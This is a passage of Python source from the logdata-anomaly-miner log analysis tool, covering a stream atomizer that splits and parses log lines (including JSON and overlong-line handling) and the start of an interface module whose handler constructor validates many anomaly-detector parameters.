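        self.atom_handler_list = atom_handler_list
        if not isinstance(event_handler_list, list) or not all(isinstance(x, EventHandlerInterface) for x in event_handler_list):
            msg = "event_handler_list must be a list of EventHandlerInterface!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.event_handler_list = event_handler_list
        # bool is a subclass of int and has to be excluded explicitly.
        if isinstance(max_line_length, bool) or not isinstance(max_line_length, int):
            msg = "max_line_length must be of type integer!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if max_line_length <= 0:
            # The value check previously reused the type-check wording, which hid the actual cause.
            msg = "max_line_length must be greater than zero!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.max_line_length = max_line_length
        if not isinstance(default_timestamp_path_list, list) or not all(isinstance(x, str) for x in default_timestamp_path_list):
            msg = "default_timestamp_path_list must be a list of strings!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.default_timestamp_path_list = default_timestamp_path_list
        if not isinstance(eol_sep, bytes):
            msg = "eol_sep parameter must be of type bytes!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(eol_sep) == 0:
            msg = "eol_sep parameter must not be empty!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.eol_sep = eol_sep
        if not isinstance(json_format, bool):
            msg = "json_format parameter must be of type boolean!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.json_format = json_format
        if not isinstance(xml_format, bool):
            msg = "xml_format parameter must be of type boolean!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.xml_format = xml_format
        if json_format is True and xml_format is True:
            msg = "json_format and xml_format can not be true at the same time."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(use_real_time, bool):
            msg = "use_real_time parameter must be of type boolean!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.use_real_time = use_real_time
        if resource_name is not None and not isinstance(resource_name, (bytes, str)):
            msg = "resource_name parameter must be of type string or bytes!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.resource_name = resource_name
        self.printed_warning = False
        if not isinstance(continuous_timestamp_missing_warning, bool):
            msg = "continuous_timestamp_missing_warning parameter must be of type boolean!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.continuous_timestamp_missing_warning = continuous_timestamp_missing_warning
        # Set while the remainder of a line that already exceeded max_line_length is being skipped.
        self.in_overlong_line_flag = False
        # If consuming of data was already attempted but the downstream handlers refused to handle it, keep the data and the parsed
        # object to avoid expensive duplicate parsing operation. The data does not include the line separators any more.
        self.last_unconsumed_log_atom = None

    def consume_data(self, stream_data, end_of_stream_flag=False):
        """Consume data from the underlying stream for atomizing.

        @param stream_data the bytes offered for consumption.
        @param end_of_stream_flag True when stream_data is the last data of the stream; an unterminated tail is then reported
               as "Incomplete last line" and consumed.
        @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was
        consumed at the moment but data might be consumed later on.
        """
        # The JSON detection path communicates through module-level globals (see found_json).
        global breakout
        global data
        # Loop until as much streamData as possible was processed and then return a result. The correct processing of endOfStreamFlag
        # is tricky: by default, even when all data was processed, do one more iteration to handle also the flag.
        consumed_length = 0
        if self.xml_format:
            # XML mode: the whole offered buffer is one atom.
            if len(stream_data) == 0:
                return -1
            log_atom = self.parse_log_atom(stream_data)
            if self.dispatch_atom(log_atom):
                return len(stream_data)
        while True:
            if self.last_unconsumed_log_atom is not None:
                # Keep length before dispatching: dispatch will reset the field.
                data_length = len(self.last_unconsumed_log_atom.raw_data)
                if self.dispatch_atom(self.last_unconsumed_log_atom):
                    consumed_length += data_length + len(self.eol_sep)
                    continue
                # Nothing consumed, tell upstream to wait if appropriate.
                if consumed_length == 0:
                    consumed_length = -1
                break
            line_end = None
            breakout = False
            data = None
            valid_json = False
            if self.json_format:
                # Feed bytes into the JSON state machine until a document completes, the machine rejects the input,
                # or the max_line_length bound is exceeded.
                state = json_machine(found_json)
                i = 0
                for i, char in enumerate(stream_data[consumed_length:]):
                    state = state(char)
                    if breakout or state is None or i > self.max_line_length:
                        break
                # check if the json is still valid, but the stream_data is at the end
                if not breakout and state is not None and i + consumed_length == len(stream_data) - 1 and not end_of_stream_flag:
                    return consumed_length
                if 0 < i <= self.max_line_length and b"{" in stream_data[consumed_length:consumed_length+i+1] and data is not None:
                    line_end = consumed_length + i + 1
                    valid_json = True
                elif i > self.max_line_length:
                    self.in_overlong_line_flag = True
            if line_end is None:
                line_end = stream_data.find(self.eol_sep, consumed_length)
            if self.in_overlong_line_flag:
                # Skip the rest of an overlong line up to (and including) the next separator.
                if line_end < 0:
                    consumed_length = len(stream_data)
                    if end_of_stream_flag:
                        self.dispatch_event("Overlong line terminated by end of stream", stream_data)
                        self.in_overlong_line_flag = False
                    break
                consumed_length = line_end + len(self.eol_sep)
                self.in_overlong_line_flag = False
                continue
            # This is the valid start of a normal/incomplete/overlong line.
            if line_end < 0:
                tail_length = len(stream_data) - consumed_length
                if tail_length > self.max_line_length:
                    self.dispatch_event("Start of overlong line detected", stream_data[consumed_length:])
                    self.in_overlong_line_flag = True
                    consumed_length = len(stream_data)
                    # Stay in loop to handle also endOfStreamFlag!
                    continue
                if end_of_stream_flag and (tail_length != 0):
                    self.dispatch_event("Incomplete last line", stream_data[consumed_length:])
                    consumed_length = len(stream_data)
                break
            # This is at least a complete/overlong line.
            line_length = line_end + len(self.eol_sep) - consumed_length
            if line_length > self.max_line_length and not valid_json:
                self.dispatch_event("Overlong line detected", stream_data[consumed_length:line_end])
                consumed_length = line_end + len(self.eol_sep)
                continue
            # This is a normal line.
            line_data = stream_data[consumed_length:line_end]
            log_atom = self.parse_log_atom(line_data)
            if self.dispatch_atom(log_atom):
                # For JSON atoms not followed by eol_sep, do not count a separator that is not there (bool subtracts 0 or 1).
                consumed_length = line_end + len(self.eol_sep) - (
                    valid_json and stream_data[line_end:line_end+len(self.eol_sep)] != self.eol_sep)
                continue
            if consumed_length == 0:
                # Downstream did not want the data, so tell upstream to block for a while.
                consumed_length = -1
            break
        return consumed_length

    def parse_log_atom(self, parse_data):
        """Parse a log atom.

        @param parse_data the raw bytes of one line (without the line separator).
        @return a LogAtom; parser_match is set only when the model matched the complete data, and atom_time is taken from the
                first matching default_timestamp_path, from time.time() when use_real_time is set, else left None.
        """
        log_atom = LogAtom(parse_data, None, None, self)
        if self.parsing_model is not None:
            match_context = MatchContext(parse_data)
            match_element = self.parsing_model.get_match_element("", match_context)
            # Only a match that consumed all data counts; leftover match_data means a partial match.
            if (match_element is not None) and not match_context.match_data:
                log_atom.parser_match = ParserMatch(match_element)
                for default_timestamp_path in self.default_timestamp_path_list:
                    ts_match = log_atom.parser_match.get_match_dictionary().get(default_timestamp_path, None)
                    if ts_match is not None:
                        log_atom.set_timestamp(ts_match.match_object)
                        break
        if log_atom.atom_time is None:
            if self.use_real_time:
                log_atom.atom_time = time.time()
            elif not self.printed_warning or self.continuous_timestamp_missing_warning:
                msg = ("No timestamp was found for a log_atom. The timestamp_paths parameter is probably not set correctly in the"
                       " Input config which might lead to errors. Alternatively the use_real_time parameter might be used in the Input "
                       "config. To show this message only once, set continuous_timestamp_missing_warning to false in the Input config.")
                print("WARNING: " + msg, file=sys.stderr)
                logging.getLogger(DEBUG_LOG_NAME).warning(msg)
                self.printed_warning = True
        return log_atom

    def dispatch_atom(self, log_atom):
        """Dispatch the data using the appropriate handlers.

        Also clean or set lastUnconsumed fields depending on outcome of dispatching.
        @param log_atom the atom to offer to every handler in atom_handler_list.
        @return True when no handlers are registered (the atom is dropped) or at least one handler accepted the atom.
        """
        # Class-level counter shared by all instances; used only for the periodic progress log line.
        type(self).COUNTER = type(self).COUNTER + 1
        if self.COUNTER % 1000 == 0 and self.COUNTER != 0:
            logging.getLogger(DEBUG_LOG_NAME).info("%d log atoms were processed totally.", self.COUNTER)
        was_consumed_flag = False
        if not self.atom_handler_list:
            was_consumed_flag = True
        else:
            for handler in self.atom_handler_list:
                if handler.receive_atom(log_atom):
                    was_consumed_flag = True
        if was_consumed_flag:
            self.last_unconsumed_log_atom = None
        else:
            self.last_unconsumed_log_atom = log_atom
        return was_consumed_flag

    def dispatch_event(self, message, line_data):
        """Dispatch an event with given message and line data to all event handlers.

        @param message the event message (e.g. "Overlong line detected").
        @param line_data the raw bytes the event refers to; passed as the single entry of the sorted log lines.
        """
        if self.event_handler_list is None:
            return
        for handler in self.event_handler_list:
            handler.receive_event(f"Input.{self.__class__.__name__}", message, [line_data], None, None, self)
InputInterfaces.py000066400000000000000000000774551500476301700337600ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input
"""This file contains interface definition useful implemented by classes in this directory and for use from code outside this
directory. All classes are defined in separate files, only the namespace references are added here to simplify the code.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .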
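"""
import abc
import time
import logging
from io import IOBase
from aminer.AminerConfig import STAT_LOG_NAME, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer.events.EventInterfaces import EventHandlerInterface
from aminer import AminerConfig


class AtomizerFactory(metaclass=abc.ABCMeta):
    """This is the common interface of all factories to create atomizers for new data sources.

    These atomizers are integrated into the downstream processing pipeline.
    """

    @abc.abstractmethod
    def get_atomizer_for_resource(self, resource_name):
        """Get an atomizer for a given resource.

        @param resource_name the name of the resource the atomizer is created for.
        @return a StreamAtomizer object
        """


class StreamAtomizer(metaclass=abc.ABCMeta):
    """This is the common interface of all binary stream atomizers.

    Atomizers in general should be good detecting and reporting malformed atoms but continue to function by attempting error
    correction or resynchronization with the stream after the bad atom. This type of atomizer also signals a stream source when
    the stream data cannot be handled at the moment to throttle reading of the underlying stream.
    """

    @abc.abstractmethod
    def consume_data(self, stream_data, end_of_stream_flag=False):
        """Consume data from the underlying stream for atomizing.

        Data should only be consumed after splitting of an atom. The caller has to keep unconsumed data till the next invocation.
        @param stream_data the data offered to be consumed or zero length data when endOfStreamFlag is True (see below).
        @param end_of_stream_flag this flag is used to indicate, that the streamData offered is the last from the input stream.
        If the streamData does not form a complete atom, no rollover is expected or rollover would have honoured the atom
        boundaries, then the StreamAtomizer should treat that as an error. With rollover, consuming of the stream end data will
        signal the invoker to continue with data from next stream. When end of stream was reached but invoker has no streamData
        to send, it will invoke this method with zero-length data, which has to be consumed with a zero-length reply.
        @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was
        consumed at the moment but data might be consumed later on. The only situation where 0 is not an allowed return value
        is when end_of_stream_flag is set and stream_data not empty.
        """


class AtomHandlerInterface(metaclass=abc.ABCMeta):
    """This is the common interface of all handlers suitable for receiving log atoms."""

    output_event_handlers = None

    def __init__(self, mutable_default_args=None, learn_mode=None, stop_learning_time=None, stop_learning_no_anomaly_time=None,
                 **kwargs):
        """Initialize the parameters of analysis components and validate them.

        Every keyword argument is bound as an attribute of the same name; unknown names are rejected. The bulk of this method
        consists of per-attribute type and range checks that apply only to attributes actually present on the instance.
        See the classes of the analysis components for parameter descriptions.
        @param mutable_default_args names of attributes that get an empty list/dict/set/tuple (chosen by name suffix) when
               still None after binding.
        @param learn_mode when False, stop_learning_time and stop_learning_no_anomaly_time must not be set.
        @param stop_learning_time positive number or None; mutually exclusive with stop_learning_no_anomaly_time.
        @param stop_learning_no_anomaly_time positive number or None.
        @raise ValueError for unknown keyword arguments and out-of-range or inconsistent values.
        @raise TypeError for attributes of the wrong type.
        """
        allowed_kwargs = [
            "mutable_default_args", "aminer_config", "anomaly_event_handlers", "learn_mode", "persistence_id", "id_path_list",
            "stop_learning_time", "stop_learning_no_anomaly_time", "output_logline", "target_path_list", "constraint_list",
            "ignore_list", "allowlist_rules", "subhandler_list", "stop_when_handled_flag", "parsed_atom_handler_lookup_list",
            "default_parsed_atom_handler", "target_path", "parsed_atom_handler_dict", "allow_missing_values_flag",
            "tuple_transformation_function", "prob_thresh", "skip_repetitions", "max_hypotheses", "hypothesis_max_delta_time",
            "generation_probability", "generation_factor", "max_observations", "p0", "alpha", "candidates_size",
            "hypotheses_eval_delta_time", "delta_time_to_discard_hypothesis", "check_rules_flag", "window_size",
            "scoring_path_list", "num_windows", "confidence_factor", "empty_window_warnings", "early_exceeding_anomaly_output",
            "set_lower_limit", "set_upper_limit", "local_maximum_threshold", "seq_len", "allow_missing_id", "timeout",
            "allowed_id_tuples", "min_num_vals", "max_num_vals", "save_values", "track_time_for_tsa", "waiting_time",
            "num_sections_waiting_time", "histogram_definitions", "report_interval", "reset_after_report_flag",
            "target_value_list", "timestamp_path", "min_bin_elements", "min_bin_time", "debug_mode", "stream", "separator",
            "missing_value_string", "num_log_lines_solidify_matrix", "time_output_threshold", "anomaly_threshold",
            "default_interval", "realert_interval", "combine_values", "min_allowed_time_diff", "target_label_list",
            "split_reports_flag", "event_type_detector", "num_init", "force_period_length", "set_period_length", "alpha_bt",
            "num_results_bt", "num_min_time_history", "num_max_time_history", "num_periods_tsa_ini", "time_period_length",
            "max_time_diff", "num_reduce_time_list", "min_anomaly_score", "min_variance", "parallel_check_count",
            "record_count_before_event", "use_path_match", "use_value_match", "min_rule_attributes", "max_rule_attributes",
            "exit_on_error_flag", "acf_pause_interval_percentage", "acf_auto_pause_interval", "acf_auto_pause_interval_num_min",
            "build_sum_over_values", "num_division_time_step", "acf_threshold", "round_time_interval_threshold",
            "min_log_lines_per_time_step", "num_update", "disc_div_thres", "num_steps_create_new_rules",
            "num_upd_until_validation", "num_end_learning_phase", "check_cor_thres", "check_cor_prob_thres",
            "check_cor_num_thres", "min_values_cors_thres", "new_vals_alarm_thres", "num_bt", "used_homogeneity_test",
            "alpha_chisquare_test", "max_dist_rule_distr", "used_presel_meth", "intersect_presel_meth", "percentage_random_cors",
            "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit", "match_disc_distr_threshold", "used_cor_meth",
            "used_validate_cor_meth", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "used_gof_test",
            "gof_alpha", "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres",
            "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_pause_others",
            "test_gof_int", "num_stop_update", "silence_output_without_confidence", "silence_output_except_indicator",
            "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update",
            "num_updates_until_var_reduction", "var_reduction_thres", "num_skipped_ind_for_weights", "num_ind_for_weights",
            "used_multinomial_test", "use_empiric_distr", "used_range_test", "range_alpha", "range_threshold",
            "num_reinit_range", "range_limits_factor", "dw_alpha", "save_statistics", "idf", "norm", "add_normal",
            "check_empty_windows", "unique_path_list", "default_freqs", "var_factor", "avg_factor", "log_resource_ignore_list"
        ]
        self.log_success = 0
        self.log_total = 0
        # Bind the named parameters as attributes when they are not None. The previous implementation sliced locals() for
        # this, which depended on local-variable ordering; that slice also bound the kwargs dict itself as self.kwargs, so
        # it is kept here for compatibility with subclasses that may read it.
        for argument, value in (("mutable_default_args", mutable_default_args), ("learn_mode", learn_mode),
                                ("stop_learning_time", stop_learning_time),
                                ("stop_learning_no_anomaly_time", stop_learning_no_anomaly_time), ("kwargs", kwargs)):
            if value is not None:
                setattr(self, argument, value)
        for argument, value in kwargs.items():
            if argument not in allowed_kwargs:
                msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            setattr(self, argument, value)

        # test booleans
        for attr in ("learn_mode", "output_logline", "split_reports_flag", "exit_on_error_flag", "stop_when_handled_flag",
                     "debug_mode", "combine_values", "reset_after_report_flag", "allow_missing_values_flag", "allow_missing_id",
                     "save_values", "use_path_match", "use_value_match", "check_rules_flag", "empty_window_warnings",
                     "early_exceeding_anomaly_output", "default_freqs", "skip_repetitions", "idf", "norm", "add_normal",
                     "check_empty_windows", "force_period_length", "acf_auto_pause_interval", "build_sum_over_values",
                     "intersect_presel_meth", "test_gof_int", "num_stop_update", "silence_output_without_confidence",
                     "silence_output_except_indicator", "use_empiric_distr", "save_statistics"):
            # Only attributes passed by the caller are checked; learn_mode is a named parameter and is checked whenever set.
            if hasattr(self, attr) and (attr in kwargs or attr == "learn_mode"):
                attr_val = self.__getattribute__(attr)
                if not isinstance(attr_val, bool):
                    msg = f"{attr} has to be of the type bool."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
        if hasattr(self, "use_path_match") and hasattr(self, "use_value_match") and not self.use_path_match and not self.use_value_match:
            msg = "Either use_path_match or use_value_match must be used."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

        # test strings: those in non_empty_strings must be str; timestamp_path may additionally be None.
        non_empty_strings = ["persistence_id", "target_path", "used_homogeneity_test", "used_gof_test", "used_multinomial_test",
                             "used_range_test"]
        for attr in non_empty_strings + ["timestamp_path"]:
            if hasattr(self, attr):
                attr_val = self.__getattribute__(attr)
                if not (attr not in non_empty_strings and attr_val is None) and not isinstance(attr_val, str):
                    msg = f"{attr} has to be of the type string."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
                # test non-empty strings
                if attr_val is not None and len(attr_val) == 0:
                    msg = f"{attr} must not be empty."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)

        # test byte-strings
        for attr in ["separator", "missing_value_string"]:
            if hasattr(self, attr):
                attr_val = self.__getattribute__(attr)
                if not isinstance(attr_val, bytes):
                    msg = f"{attr} has to be of the type bytes."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
                # test non-empty byte-strings (the original compared the attribute NAME against None here, which is never true)
                if attr in ("separator",) and (attr_val is None or len(attr_val) < 1):
                    msg = f"{attr} must not be empty."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)

        # list of strings
        for attr in ["used_presel_meth", "used_cor_meth", "used_validate_cor_meth"]:
            if hasattr(self, attr):
                attr_val = self.__getattribute__(attr)
                if attr_val is not None and (not isinstance(attr_val, list) or not all(isinstance(handler, str) for handler in attr_val)):
                    msg = f"Only subclasses of String are allowed in {attr}."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)

        # test numeric values
        integer_only = [
            "min_bin_elements", "min_num_vals", "max_num_vals", "parallel_check_count", "record_count_before_event",
            "min_rule_attributes", "max_rule_attributes", "max_hypotheses", "max_observations", "candidates_size", "num_windows",
            "seq_len", "num_log_lines_solidify_matrix", "report_interval", "num_init", "set_period_length", "num_results_bt",
            "num_periods_tsa_ini", "acf_auto_pause_interval_num_min", "num_division_time_step", "set_period_length",
            "min_log_lines_per_time_step", "time_period_length", "max_time_diff", "num_reduce_time_list", "num_update",
            "num_steps_create_new_rules", "num_end_learning_phase", "check_cor_num_thres", "min_values_cors_thres", "num_bt",
            "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_pause_others",
            "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update",
            "num_updates_until_var_reduction", "num_skipped_ind_for_weights", "num_ind_for_weights", "num_reinit_range"]
        non_negative = [
            "set_lower_limit", "time_output_threshold", "disc_div_thres", "num_upd_until_validation", "num_upd_until_validation",
            "check_cor_thres", "check_cor_prob_thres", "check_cor_num_thres", "min_values_cors_thres", "alpha_chisquare_test",
            "max_dist_rule_distr", "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit",
            "match_disc_distr_threshold", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "gof_alpha",
            "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres",
            "var_reduction_thres", "range_alpha", "range_threshold", "num_pause_others"]
        non_zero_or_negative = [
            "min_bin_time", "min_bin_elements", "default_interval", "realert_interval", "min_allowed_time_diff",
            "parallel_check_count", "record_count_before_event", "max_rule_attributes", "max_hypotheses",
            "hypothesis_max_delta_time", "max_observations", "candidates_size", "hypotheses_eval_delta_time",
            "delta_time_to_discard_hypothesis", "window_size", "num_windows", "seq_len", "num_log_lines_solidify_matrix",
            "set_upper_limit", "timeout", "num_init", "set_period_length", "num_min_time_history", "num_max_time_history",
            "num_periods_tsa_ini", "num_results_bt", "waiting_time", "num_sections_waiting_time",
            "acf_auto_pause_interval_num_min", "num_division_time_step", "set_period_length", "min_log_lines_per_time_step",
            "time_period_length", "max_time_diff", "num_reduce_time_list", "min_anomaly_score", "num_update",
            "new_vals_alarm_thres", "num_bt", "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt",
            "num_pause_discrete", "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind",
            "num_stat_stop_update", "num_updates_until_var_reduction", "num_skipped_ind_for_weights", "num_ind_for_weights",
            "num_reinit_range", "range_limits_factor", "dw_alpha"]
        zero_to_one = [
            "generation_probability", "generation_factor", "p0", "alpha", "confidence_factor", "prob_thresh", "anomaly_threshold",
            "alpha", "alpha_bt", "acf_pause_interval_percentage", "acf_threshold", "round_time_interval_threshold", "min_variance",
            "local_maximum_threshold", "disc_div_thres", "check_cor_thres", "check_cor_prob_thres", "alpha_chisquare_test",
            "max_dist_rule_distr", "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit",
            "match_disc_distr_threshold", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "gof_alpha",
            "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres",
            "var_reduction_thres", "range_alpha", "range_threshold", "dw_alpha"]
        nullable = ["stop_learning_time", "stop_learning_no_anomaly_time", "set_lower_limit", "set_upper_limit", "timeout"]
        # dict.fromkeys de-duplicates like set() but keeps a deterministic order, so the first reported error is reproducible.
        for attr in dict.fromkeys(integer_only + non_negative + non_zero_or_negative + zero_to_one):
            if hasattr(self, attr):
                attr_val = self.__getattribute__(attr)
                # bool is a subclass of int and is rejected explicitly in both numeric checks.
                if attr in integer_only and (isinstance(attr_val, bool) or not isinstance(attr_val, int)):
                    msg = f"{attr} has to be of the type integer."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
                if (isinstance(attr_val, bool) or not isinstance(attr_val, (int, float))) and not (attr in nullable and attr_val is None):
                    msg = f"{attr} has to be of the type float or integer."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
                # test non-negative values
                if attr in non_negative and attr_val is not None and attr_val < 0:
                    msg = f"{attr} must not be negative."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
                # test non-zero-or-negative values
                if attr in non_zero_or_negative and attr_val is not None and attr_val <= 0:
                    msg = f"{attr} must not be zero or negative."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
                # test zero-to-one values
                if attr in zero_to_one and attr_val is not None and (attr_val < 0 or attr_val > 1):
                    msg = f"{attr} must be a value between zero and one."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
        if hasattr(self, "min_num_vals") and hasattr(self, "max_num_vals") and (
                self.min_num_vals >= self.max_num_vals or self.min_num_vals < 0):
            msg = "min_num_vals must be smaller than max_num_vals and both values must be bigger than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "num_min_time_history") and hasattr(self, "num_max_time_history") and (
                self.num_min_time_history >= self.num_max_time_history or self.num_min_time_history < 0):
            msg = "num_min_time_history must be smaller than num_max_time_history and both values must be bigger than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "num_s_gof_values") and hasattr(self, "num_init") and hasattr(self, "num_update") and (
                self.num_s_gof_values < self.num_update or self.num_s_gof_values > self.num_init):
            # Message corrected: the lower bound checked above is num_update, not num_init.
            msg = "num_s_gof_values must be smaller than or equal to num_init and greater than or equal to num_update."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if learn_mode is False and (stop_learning_time is not None or stop_learning_no_anomaly_time is not None):
            msg = "It is not possible to use the stop_learning_time or stop_learning_no_anomaly_time when the learn_mode is False."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if stop_learning_time is not None and stop_learning_no_anomaly_time is not None:
            msg = "stop_learning_time is mutually exclusive to stop_learning_no_anomaly_time. Only one of these attributes may be used."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if (stop_learning_time is not None and stop_learning_time <= 0) or (
                stop_learning_no_anomaly_time is not None and stop_learning_no_anomaly_time <= 0):
            msg = "stop_learning_time and stop_learning_no_anomaly_time must be bigger than 0."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "aminer_config"):
            self.next_persist_time = time.time() + self.aminer_config.config_properties.get(
                KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        if hasattr(self, "anomaly_event_handlers") and (
                not isinstance(self.anomaly_event_handlers, list) or
                not all(isinstance(handler, EventHandlerInterface) for handler in self.anomaly_event_handlers)):
            msg = "Only subclasses of EventHandlerInterface are allowed in anomaly_event_handlers."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.stop_learning_time_initialized = False
        self.stop_learning_time = stop_learning_time
        self.stop_learning_no_anomaly_time = stop_learning_no_anomaly_time
        # Replace None defaults of container attributes by fresh empty containers, chosen by the attribute name suffix.
        if mutable_default_args is not None:
            for argument in mutable_default_args:
                if hasattr(self, argument) and getattr(self, argument) is not None:
                    continue
                if argument.endswith("list"):
                    setattr(self, argument, [])
                elif argument.endswith("dict"):
                    setattr(self, argument, {})
                elif argument.endswith("set"):
                    setattr(self, argument, set())
                elif argument.endswith("tuple"):
                    setattr(self, argument, ())
        if hasattr(self, "subhandler_list"):
            if (not isinstance(self.subhandler_list, list)) or \
                    (not all(isinstance(handler, AtomHandlerInterface) for handler in self.subhandler_list)):
                msg = "Only subclasses of AtomHandlerInterface are allowed in subhandler_list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            # Each entry becomes a (handler, stop_when_handled_flag) pair.
            for handler_pos, handler_element in enumerate(self.subhandler_list):
                self.subhandler_list[handler_pos] = (handler_element, self.stop_when_handled_flag)
        if hasattr(self, "parsed_atom_handler_lookup_list") and (
                not isinstance(self.parsed_atom_handler_lookup_list, list) or
                not all(isinstance(val, tuple) for val in self.parsed_atom_handler_lookup_list) or
                not all(len(val) == 2 for val in self.parsed_atom_handler_lookup_list) or
                not all(isinstance(path, str) and isinstance(handler, AtomHandlerInterface)
                        for path, handler in self.parsed_atom_handler_lookup_list)):
            msg = "Only subclasses of (String, AtomHandlerInterface) are allowed in parsed_atom_handler_lookup_list."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "default_parsed_atom_handler") and self.default_parsed_atom_handler is not None and \
                not isinstance(self.default_parsed_atom_handler, AtomHandlerInterface):
            msg = "Only subclasses of AtomHandlerInterface are allowed in default_parsed_atom_handler."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "parsed_atom_handler_dict") and (
                not isinstance(self.parsed_atom_handler_dict, dict) or
                not all(isinstance(key, bytes) for key in self.parsed_atom_handler_dict.keys()) or
                not all(isinstance(handler, AtomHandlerInterface) for handler in self.parsed_atom_handler_dict.values())):
            msg = "Only subclasses of AtomHandlerInterface are allowed in parsed_atom_handler_dict."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "allowed_id_tuples"):
            if self.allowed_id_tuples is None:
                self.allowed_id_tuples = []
            if not isinstance(self.allowed_id_tuples, list) or not all(isinstance(x, tuple) and len(x) != 0 for x in self.allowed_id_tuples):
                msg = "allowed_id_tuples must be of type list with tuples as values."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            self.allowed_id_tuples = [tuple(x) for x in self.allowed_id_tuples]
        if hasattr(self, "confidence_factor") and not 0 <= self.confidence_factor <= 1:
            # Out-of-range values are clamped to 1 with a warning rather than rejected.
            logging.getLogger(DEBUG_LOG_NAME).warning('confidence_factor must be in the range [0,1]!')
            self.confidence_factor = 1
        if not hasattr(self, "persistence_id"):
            self.persistence_id = None  # persistence_id is always needed.
        for attr in ("id_path_list", "target_path_list", "constraint_list", "ignore_list", "target_label_list", "unique_path_list",
                     "scoring_path_list", "log_resource_ignore_list"):
            if hasattr(self, attr) and self.__getattribute__(attr) is not None:
                attr_val = self.__getattribute__(attr)
                if not isinstance(attr_val, list):
                    msg = f"{attr} has to be of the type list."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
                for path in attr_val:
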